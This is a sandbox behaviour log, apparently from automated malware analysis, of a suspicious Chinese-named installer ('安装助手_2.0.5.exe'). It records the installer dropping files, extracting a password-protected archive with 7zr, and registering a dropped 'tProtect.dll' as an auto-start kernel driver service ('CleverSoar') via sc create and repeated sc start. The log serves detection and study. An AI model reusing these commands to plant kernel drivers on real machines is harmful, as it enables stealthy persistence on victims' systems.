Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic file information: File size 5707472 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.1550924989.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.1550847522.0000000003970000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008A57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_008A57D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.7.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: real checksum: 0x0 should be: 0x571b37
Source: hrsw.vbc.7.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.13.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.drStatic PE information: section name: .didata
Source: 7zr.exe.7.drStatic PE information: section name: .sxdata
Source: update.vac.7.drStatic PE information: section name: .00cfg
Source: update.vac.7.drStatic PE information: section name: .voltbl
Source: update.vac.7.drStatic PE information: section name: .=~
Source: is-HSQ4G.tmp.7.drStatic PE information: section name: .xdata
Source: hrsw.vbc.7.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.7.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.7.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6986EB push ecx; ret 7_2_6C6986FE
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C540F00 push ss; retn 0001h7_2_6C540F0A
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C766F10 push eax; ret 7_2_6C766F2E
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6CB9F4 push 004AC35Ch; ret 7_2_6C6CBA0E
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C767290 push eax; ret 7_2_6C7672BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008245F4 push 008CC35Ch; ret 11_2_0082460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008BFB10 push eax; ret 11_2_008BFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008BFE90 push eax; ret 11_2_008BFEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\is-HSQ4G.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
